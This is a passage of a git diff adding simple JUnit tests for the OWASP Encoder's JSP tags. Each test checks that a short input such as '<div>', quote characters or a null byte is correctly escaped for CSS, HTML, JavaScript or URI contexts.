OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCssStringTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssStringTagTest extends EncodingTagTest { + + public ForCssStringTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCssStringTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCssStringTag instance = new ForCssStringTag(); + String value = "
    "; + String expected = "\\3c div\\3e"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java new file mode 100644 index 0000000..c787988 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCssUrlTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssUrlTagTest extends EncodingTagTest { + + public ForCssUrlTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCssUrlTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCssUrlTag instance = new ForCssUrlTag(); + String value = "\\';"; + String expected = "\\5c\\27;"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected, results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java new file mode 100644 index 0000000..34d63fc --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlAttributeTagTest extends EncodingTagTest { + + public ForHtmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlAttributeTag instance = new ForHtmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java new file mode 100644 index 0000000..9a9703c --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlContentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlContentTagTest extends EncodingTagTest { + + public ForHtmlContentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlContentTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlContentTag instance = new ForHtmlContentTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java new file mode 100644 index 0000000..9f73173 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlTagTest extends EncodingTagTest { + + public ForHtmlTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlTag instance = new ForHtmlTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java new file mode 100644 index 0000000..4d1cae0 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlUnquotedAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest { + + public ForHtmlUnquotedAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlUnquotedAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag(); + String value = "
    "; + String expected = "<div> </div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java new file mode 100644 index 0000000..6829820 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptAttributeTagTest extends EncodingTagTest { + + public ForJavaScriptAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag(); + String value = "
    \"\'"; + String expected = "
    \\x22\\x27"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java new file mode 100644 index 0000000..79d7163 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptBlockTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptBlockTagTest extends EncodingTagTest { + + public ForJavaScriptBlockTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptBlockTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag(); + String value = "'\"\0"; + String expected = "\\'\\\"\\x00"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java new file mode 100644 index 0000000..400c8d9 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptSourceTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptSourceTagTest extends EncodingTagTest { + + public ForJavaScriptSourceTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptSourceTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag(); + String value = "\0'\""; + String expected = "\\x00\\'\\\""; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java new file mode 100644 index 0000000..c7427a7 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java @@ -0,0 +1,46 @@ +/* + * To change this template, choose Tools | Templates + * and open the template in the editor. + */ +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptTagTest extends EncodingTagTest { + + public ForJavaScriptTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptTag instance = new ForJavaScriptTag(); + String value = "\0'\""; + String expected = "\\x00\\x27\\x22"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java new file mode 100644 index 0000000..6709cde --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForUriComponentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriComponentTagTest extends EncodingTagTest { + + public ForUriComponentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForUriComponentTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForUriComponentTag instance = new ForUriComponentTag(); + String value = "&=test"; + String expected = "%26amp%3B%3Dtest"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java new file mode 100644 index 0000000..d401d89 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForUriTag. + * + * 